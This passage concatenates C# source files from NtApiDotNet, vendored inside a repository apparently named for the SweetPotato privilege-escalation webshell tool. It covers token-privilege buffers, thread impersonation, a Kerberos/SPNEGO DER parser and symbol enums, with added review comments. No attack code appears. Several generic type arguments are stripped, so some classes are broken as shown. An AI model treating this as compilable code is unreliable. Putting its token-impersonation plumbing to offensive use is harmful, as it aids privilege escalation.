12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Text;
16 |
17 | namespace NtApiDotNet
18 | {
// Native buffer holding a string as UTF-16LE bytes (Encoding.Unicode) followed by a NUL
// terminator. A null str yields a buffer containing only the terminator, because
// concatenating null with "\0" gives "\0".
internal sealed class SafeStringBuffer : SafeHGlobalBuffer
{
    public SafeStringBuffer(string str) : base(Encoding.Unicode.GetBytes(str + "\0"))
    {
    }
}
25 | }
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeTokenPrivilegesBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet
19 | {
/// <summary>
/// Safe buffer for token privileges.
/// </summary>
// NOTE(review): the base type appears without a type argument in this listing; it was
// probably dropped during extraction - confirm against the original file.
public class SafeTokenPrivilegesBuffer : SafeStructureInOutBuffer
{
    /// <summary>
    /// Constructor.
    /// </summary>
    /// <param name="privs">List of privileges.</param>
    // The header is a TokenPrivileges with PrivilegeCount set to privs.Length, followed by
    // room for privs.Length LuidAndAttributes entries, which are then copied into Data.
    // privs is dereferenced in the base call, so null raises NullReferenceException there.
    public SafeTokenPrivilegesBuffer(LuidAndAttributes[] privs)
        : base(new TokenPrivileges() { PrivilegeCount = privs.Length },
              Marshal.SizeOf(typeof(LuidAndAttributes)) * privs.Length, true)
    {
        Data.WriteArray(0, privs, 0, privs.Length);
    }

    // Used only by Null: wraps IntPtr.Zero with zero length and does not own it.
    private SafeTokenPrivilegesBuffer()
        : base(IntPtr.Zero, 0, false)
    {
    }

    /// <summary>
    /// NULL safe buffer.
    /// </summary>
    // Every read of this property creates a new instance.
    new public static SafeTokenPrivilegesBuffer Null { get { return new SafeTokenPrivilegesBuffer(); } }
}
46 | #pragma warning restore 1591
47 | }
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/ThreadImpersonationContext.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet
18 | {
/// <summary>
/// Disposable class to scope an impersonation context.
/// </summary>
/// <remarks>
/// Meant to be held in a using block so the impersonation token is removed when the
/// scope ends. If clearing the token throws, the exception propagates to the caller and
/// the thread reference is not cleared.
/// </remarks>
public sealed class ThreadImpersonationContext : IDisposable
{
    // Thread whose impersonation token is cleared on revert; null once reverted.
    private NtThread _thread;

    internal ThreadImpersonationContext(NtThread thread)
    {
        _thread = thread;
    }

    /// <summary>
    /// Revert impersonation back to the current user.
    /// </summary>
    public void Revert()
    {
        // Already reverted, or created without a thread: nothing to do.
        if (_thread == null)
        {
            return;
        }

        // The thread object is disposed as soon as its token has been cleared.
        using (_thread)
        {
            _thread.SetImpersonationToken(null, false);
        }
        _thread = null;
    }

    void IDisposable.Dispose()
    {
        Revert();
    }
}
51 | }
52 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/UnicodeStringBytesSafeBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet
16 | {
/// <summary>
/// Implements a UnicodeString which contains raw bytes.
/// </summary>
// NOTE(review): the base type appears without a type argument in this listing; it was
// probably dropped during extraction - confirm against the original file.
public class UnicodeStringBytesSafeBuffer : SafeStructureInOutBuffer
{
    /// <summary>
    /// Constructor.
    /// </summary>
    /// <param name="ba">The bytes for the name.</param>
    // The bytes are copied into the trailing data area and the UnicodeStringOut header is
    // pointed at that copy, so Buffer is only valid while this object is alive.
    // NOTE(review): Length and MaximumLength are ushort casts of ba.Length. An array
    // longer than 65535 bytes is silently truncated in the header while the allocation
    // keeps the full size - consider rejecting such input.
    public UnicodeStringBytesSafeBuffer(byte[] ba)
        : base(ba.Length, true)
    {
        Data.WriteBytes(ba);
        Result = new UnicodeStringOut
        {
            Length = (ushort)ba.Length,
            MaximumLength = (ushort)ba.Length,
            Buffer = Data.DangerousGetHandle()
        };
    }
}
38 | }
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/ASN1/DERParser.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Collections.Generic;
16 | using System.IO;
17 |
18 | namespace NtApiDotNet.Utilities.ASN1
19 | {
/// <summary>
/// A basic ASN.1 DER parser to process Kerberos and SPNEGO Tokens.
/// </summary>
// NOTE(review): these tokens can come from an untrusted peer. The parser recurses once
// per constructed value with no depth limit, so nesting depth is bounded only by input
// size; a hostile token could exhaust the stack. A depth cap is worth adding - confirm
// which exceptions the callers catch before choosing the failure type.
internal class DERParser
{
    // Parse every value in data[index..] and recurse into constructed values.
    // offset is passed to ReadValue for each value; children are parsed with their
    // parent's DataOffset.
    private static DERValue[] ParseData(long offset, byte[] data, int index)
    {
        // Copy the tail of the array into a stream so the reader starts at position 0.
        // NOTE(review): index is not validated here; a value outside the array makes
        // Write throw.
        MemoryStream stm = new MemoryStream();
        stm.Write(data, index, data.Length - index);
        stm.Position = 0;
        BinaryReader reader = new BinaryReader(stm);
        // NOTE(review): the element type of this list is missing in the listing,
        // probably dropped during extraction.
        List values = new List();
        while (reader.RemainingLength() > 0)
        {
            DERValue v = reader.ReadValue(offset);
            if (v.Constructed)
            {
                v.Children = ParseData(v.DataOffset, v.Data, 0);
            }
            values.Add(v);
        }
        return values.ToArray();
    }

    // Parse data starting at index, with a base offset of 0.
    public static DERValue[] ParseData(byte[] data, int index)
    {
        return ParseData(0, data, index);
    }

    // Read the whole file into memory and parse it from the first byte.
    public static DERValue[] ParseFile(string path)
    {
        return ParseData(File.ReadAllBytes(path), 0);
    }
}
54 | }
55 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/ASN1/DERTagType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Utilities.ASN1
16 | {
// Tag class of a DER value. The numeric values follow the order of the ASN.1 tag classes
// (universal, application, context-specific, private).
// NOTE(review): presumably the reader takes this from the two class bits of the
// identifier octet - confirm in the code that reads values.
internal enum DERTagType
{
    Universal = 0,
    Application = 1,
    ContextSpecific = 2,
    Private = 3,
}
24 | }
25 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/ASN1/OIDValues.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Utilities.ASN1
16 | {
/// <summary>
/// Class containing known OID values.
/// </summary>
// These identify security mechanisms and name types inside SPNEGO / GSS-API tokens. The
// same dotted strings are useful when inspecting captured tokens to see which
// mechanism was offered or selected.
internal static class OIDValues
{
    // Kerberos name-type OIDs (children of the Kerberos V5 mechanism OID below).
    internal const string KERBEROS_NAME = "1.2.840.113554.1.2.2.1";
    internal const string KERBEROS_PRINCIPAL = "1.2.840.113554.1.2.2.2";
    // Kerberos user-to-user mechanism.
    internal const string KERBEROS_USER_TO_USER_OID = "1.2.840.113554.1.2.2.3";
    // Kerberos V5 GSS-API mechanism.
    internal const string KERBEROS_OID = "1.2.840.113554.1.2.2";
    // Microsoft's variant of the Kerberos mechanism OID.
    internal const string MS_KERBEROS = "1.2.840.48018.1.2.2";
    // NTLM security support provider.
    internal const string NTLM_SSP = "1.3.6.1.4.1.311.2.2.10";
    // Microsoft NegoEx extension mechanism.
    internal const string MS_NEGOX = "1.3.6.1.4.1.311.2.2.30";
}
30 | }
31 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/ASN1/UniversalTag.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Utilities.ASN1
16 | {
// ASN.1 universal-class tag numbers recognised by the DER parser. The list is a subset;
// tag numbers not named here still convert to this enum as bare integers.
internal enum UniversalTag
{
    EOC = 0,
    BOOLEAN = 1,
    INTEGER = 2,
    BIT_STRING = 3,
    OCTET_STRING = 4,
    NULL = 5,
    OBJECT_IDENTIFIER = 6,
    ENUMERATED = 10,
    UTF8String = 12,
    RELATIVE_OBJECT_IDENTIFIER = 13,
    SEQUENCE = 16,
    SET = 17,
    PrintableString = 19,
    // Tag 20 is TeletexString (T61String) in ASN.1; the member name here reads "T16".
    T16String = 20,
    IA5String = 22,
    UTCTime = 23,
    GeneralizedTime = 24,
    GeneralString = 27,
}
38 | }
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/Memory/CrossBitnessTypeAttribute.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Reflection;
17 |
18 | namespace NtApiDotNet.Utilities.Memory
19 | {
// Attribute naming the alternative structure type to read when the target process has a
// different bitness, plus the reflection plumbing to read and convert it.
// NOTE(review): generic type arguments (on Lazy, Func, ReadType and IConvertToNative)
// are missing in this listing, probably dropped during extraction - confirm against the
// original file.
internal class CrossBitnessTypeAttribute : Attribute
{
    // ReadMemory closed over CrossBitnessType; built on first use.
    private Lazy _base_method;
    public Type CrossBitnessType { get; }

    // Take the ReadMemory method from the current process object, recover its generic
    // definition and re-instantiate it for cross_bitness_type.
    private static MethodInfo GetMethodInfo(Type cross_bitness_type)
    {
        Func read_memory = NtProcess.Current.ReadMemory;
        return read_memory.Method.GetGenericMethodDefinition().MakeGenericMethod(cross_bitness_type);
    }

    public CrossBitnessTypeAttribute(Type cross_bitness_type)
    {
        CrossBitnessType = cross_bitness_type;
        _base_method = new Lazy(() => GetMethodInfo(cross_bitness_type));
    }

    // Read a CrossBitnessType value from process at base_address via reflection, then
    // convert it through IConvertToNative. The cast throws if CrossBitnessType does not
    // implement that interface. Exceptions raised by the invoked read surface wrapped in
    // TargetInvocationException because the call goes through MethodInfo.Invoke.
    public T ReadType(NtProcess process, long base_address) where T : struct
    {
        IConvertToNative converter = (IConvertToNative)_base_method.Value.Invoke(process, new object[] { base_address });
        return converter.Convert();
    }

    // Marshalled size of CrossBitnessType in bytes.
    public int GetSize()
    {
        return System.Runtime.InteropServices.Marshal.SizeOf(CrossBitnessType);
    }
}
48 | }
49 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/Memory/SafeBufferWrapper.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Utilities.Memory
19 | {
// Non-owning SafeBuffer view over an arbitrary pointer. The buffer is initialised with a
// length of int.MaxValue, so the SafeBuffer bounds checks cannot catch an access past
// the real allocation; callers must know the true size themselves. The pointer is never
// freed here.
internal class SafeBufferWrapper : SafeBuffer
{
    public SafeBufferWrapper(IntPtr buffer)
        : base(false)
    {
        Initialize(int.MaxValue);
        handle = buffer;
    }

    // Nothing to release: the memory belongs to someone else.
    protected override bool ReleaseHandle()
    {
        return true;
    }
}
34 | }
35 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/ArrayTypeInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Debugger
16 | {
/// <summary>
/// Type information for an array.
/// </summary>
public class ArrayTypeInformation : TypeInformation
{
    /// <summary>
    /// Get array element type.
    /// </summary>
    public TypeInformation ArrayType { get; }
    /// <summary>
    /// Get number of array elements.
    /// </summary>
    public int Count { get; }

    // The base type is created with SymTagArrayType, a size of 0 and an empty name.
    // NOTE(review): Count is taken from array_type.Size, the size reported for the
    // element type - confirm that this is the intended source for an element count.
    internal ArrayTypeInformation(int type_index, SymbolLoadedModule module, TypeInformation array_type)
        : base(SymTagEnum.SymTagArrayType, 0, type_index, module, string.Empty)
    {
        ArrayType = array_type;
        Count = (int)array_type.Size;
    }
}
38 | }
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/DataSymbolInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Debugger
16 | {
/// <summary>
/// Symbol information for a data value.
/// </summary>
public class DataSymbolInformation : SymbolInformation
{
    /// <summary>
    /// Address of the symbol.
    /// </summary>
    public long Address { get; }

    // All arguments except address are forwarded unchanged to SymbolInformation.
    internal DataSymbolInformation(SymTagEnum tag, int size, int type_index,
        long address, SymbolLoadedModule module, string name)
        : base(tag, size, type_index, module, name)
    {
        Address = address;
    }
}
34 | }
35 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/EnumProcessModulesFilter.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | // NOTE: This file is a modified version of SymbolResolver.cs from OleViewDotNet
16 | // https://github.com/tyranid/oleviewdotnet. It's been relicensed from GPLv3 by
17 | // the original author James Forshaw to be used under the Apache License for this
18 | // project.
19 |
20 | using System;
21 |
namespace NtApiDotNet.Win32.Debugger
{
    /// <summary>
    /// Bit flags selecting which modules of a process are listed. The member
    /// names match the filter constants of the native module enumeration API.
    /// </summary>
    [Flags]
    enum EnumProcessModulesFilter
    {
        // No bit set: the API's default behaviour.
        LIST_MODULES_DEFAULT = 0,
        // Bit 0: 32-bit modules.
        LIST_MODULES_32BIT = 1 << 0,
        // Bit 1: 64-bit modules.
        LIST_MODULES_64BIT = 1 << 1,
        // Both bitness flags combined.
        LIST_MODULES_ALL = LIST_MODULES_64BIT | LIST_MODULES_32BIT,
    }
}
33 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/EnumTypeInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Collections.Generic;
16 |
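namespace NtApiDotNet.Win32.Debugger
{
    /// <summary>
    /// Enumerated type value: one named constant of an enumerated type.
    /// </summary>
    public sealed class EnumTypeInformationValue
    {
        /// <summary>
        /// Name of the value.
        /// </summary>
        public string Name { get; }

        /// <summary>
        /// The value as an int64.
        /// </summary>
        public long Value { get; }

        internal EnumTypeInformationValue(string name, long value)
        {
            Name = name;
            Value = value;
        }
    }

    /// <summary>
    /// Symbol information for an enumerated type.
    /// </summary>
    public class EnumTypeInformation : TypeInformation
    {
        /// <summary>
        /// Get the values for the enumerated type.
        /// </summary>
        // The listing showed a bare ICollection, which does not resolve with only
        // System.Collections.Generic imported; the element type is restored here.
        public ICollection<EnumTypeInformationValue> Values { get; }

        /// <summary>
        /// Create the enumerated type information. The collection is stored by
        /// reference, not copied, so later changes by the caller stay visible.
        /// </summary>
        internal EnumTypeInformation(long size, int type_index, SymbolLoadedModule module,
            string name, ICollection<EnumTypeInformationValue> values)
            : base(SymTagEnum.SymTagEnum, size, type_index, module, name)
        {
            Values = values;
        }
    }
}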
58 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/IMAGEHLP_SYMBOL_TYPE_INFO.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32.Debugger
{
    /// <summary>
    /// Selector for the kind of type information requested about a symbol.
    /// The numeric values are written out explicitly because they cross the
    /// native boundary and must not shift if a member is inserted or reordered.
    /// </summary>
    enum IMAGEHLP_SYMBOL_TYPE_INFO
    {
        TI_GET_SYMTAG = 0,
        TI_GET_SYMNAME = 1,
        TI_GET_LENGTH = 2,
        TI_GET_TYPE = 3,
        TI_GET_TYPEID = 4,
        TI_GET_BASETYPE = 5,
        TI_GET_ARRAYINDEXTYPEID = 6,
        TI_FINDCHILDREN = 7,
        TI_GET_DATAKIND = 8,
        TI_GET_ADDRESSOFFSET = 9,
        TI_GET_OFFSET = 10,
        TI_GET_VALUE = 11,
        TI_GET_COUNT = 12,
        TI_GET_CHILDRENCOUNT = 13,
        TI_GET_BITPOSITION = 14,
        TI_GET_VIRTUALBASECLASS = 15,
        TI_GET_VIRTUALTABLESHAPEID = 16,
        TI_GET_VIRTUALBASEPOINTEROFFSET = 17,
        TI_GET_CLASSPARENTID = 18,
        TI_GET_NESTED = 19,
        TI_GET_SYMINDEX = 20,
        TI_GET_LEXICALPARENT = 21,
        TI_GET_ADDRESS = 22,
        TI_GET_THISADJUST = 23,
        TI_GET_UDTKIND = 24,
        TI_IS_EQUIV_TO = 25,
        TI_GET_CALLING_CONVENTION = 26,
        TI_IS_CLOSE_EQUIV_TO = 27,
        TI_GTIEX_REQS_VALID = 28,
        TI_GET_VIRTUALBASEOFFSET = 29,
        TI_GET_VIRTUALBASEDISPINDEX = 30,
        TI_GET_IS_REFERENCE = 31,
        TI_GET_INDIRECTVIRTUALBASECLASS = 32,
        TI_GET_VIRTUALBASETABLETYPE = 33,
        // Sentinel: one past the last valid selector.
        IMAGEHLP_SYMBOL_TYPE_INFO_MAX = 34
    }
}
56 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/MODULEINFO.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | // NOTE: This file is a modified version of SymbolResolver.cs from OleViewDotNet
16 | // https://github.com/tyranid/oleviewdotnet. It's been relicensed from GPLv3 by
17 | // the original author James Forshaw to be used under the Apache License for this
18 | // project.
19 |
20 | using System;
21 | using System.Runtime.InteropServices;
22 |
namespace NtApiDotNet.Win32.Debugger
{
    /// <summary>
    /// Managed mirror of a native module information record. Sequential layout
    /// keeps the fields in declaration order so the marshaller can copy the
    /// structure across the native boundary.
    /// </summary>
    [StructLayout(LayoutKind.Sequential)]
    struct MODULEINFO
    {
        // Load address of the module.
        public IntPtr lpBaseOfDll;

        // Size of the mapped image. Stored as a signed 32-bit value, so
        // consumers should not assume it is non-negative without checking.
        public int SizeOfImage;

        // Entry point of the module.
        public IntPtr EntryPoint;
    }
}
33 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/PointerTypeInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
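namespace NtApiDotNet.Win32.Debugger
{
    /// <summary>
    /// Type information for a pointer value.
    /// </summary>
    public class PointerTypeInformation : TypeInformation
    {
        /// <summary>
        /// Get the type this pointer references.
        /// </summary>
        // The setter is internal, so the target can be assigned after
        // construction and may be null until then.
        public TypeInformation PointerType { get; internal set; }

        /// <summary>
        /// Indicates this pointer is a reference.
        /// </summary>
        public bool IsReference { get; }

        /// <summary>
        /// The name of the symbol: the referenced type's name followed by '*'.
        /// </summary>
        // Null-conditional access keeps the getter from throwing a
        // NullReferenceException while PointerType is unset; the result is
        // then just "*".
        public override string Name => $"{PointerType?.Name}*";

        /// <summary>
        /// Create the pointer type information; the base symbol is created
        /// with the pointer tag and an empty name.
        /// </summary>
        /// <param name="size">Size forwarded to the base class.</param>
        /// <param name="type_index">Type index forwarded to the base class.</param>
        /// <param name="module">Module forwarded to the base class.</param>
        /// <param name="pointer_type">The referenced type.</param>
        /// <param name="is_reference">True if the pointer is a reference.</param>
        internal PointerTypeInformation(long size, int type_index, SymbolLoadedModule module,
            TypeInformation pointer_type, bool is_reference)
            : base(SymTagEnum.SymTagPointerType, size, type_index, module, string.Empty)
        {
            PointerType = pointer_type;
            IsReference = is_reference;
        }
    }
}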
46 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/SYM_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | // NOTE: This file is a modified version of SymbolResolver.cs from OleViewDotNet
16 | // https://github.com/tyranid/oleviewdotnet. It's been relicensed from GPLv3 by
17 | // the original author James Forshaw to be used under the Apache License for this
18 | // project.
19 |
namespace NtApiDotNet.Win32.Debugger
{
    /// <summary>
    /// Kind of symbol data associated with a module. Values are spelled out so
    /// the numbering stays fixed if members are added or reordered.
    /// </summary>
    enum SYM_TYPE
    {
        SymNone = 0,
        SymCoff = 1,
        SymCv = 2,
        SymPdb = 3,
        SymExport = 4,
        SymDeferred = 5,
        SymSym = 6,
        SymDia = 7,
        SymVirtual = 8,
        // Sentinel: number of defined symbol types.
        NumSymTypes = 9
    }
}
36 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/SymTagEnum.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | // NOTE: This file is a modified version of SymbolResolver.cs from OleViewDotNet
16 | // https://github.com/tyranid/oleviewdotnet. It's been relicensed from GPLv3 by
17 | // the original author James Forshaw to be used under the Apache License for this
18 | // project.
19 |
namespace NtApiDotNet.Win32.Debugger
{
    /// <summary>
    /// Symbol tag identifying what kind of entity a symbol describes. Values
    /// are written explicitly so the numbering cannot drift.
    /// </summary>
    enum SymTagEnum
    {
        SymTagNull = 0,
        SymTagExe = 1,
        SymTagCompiland = 2,
        SymTagCompilandDetails = 3,
        SymTagCompilandEnv = 4,
        SymTagFunction = 5,
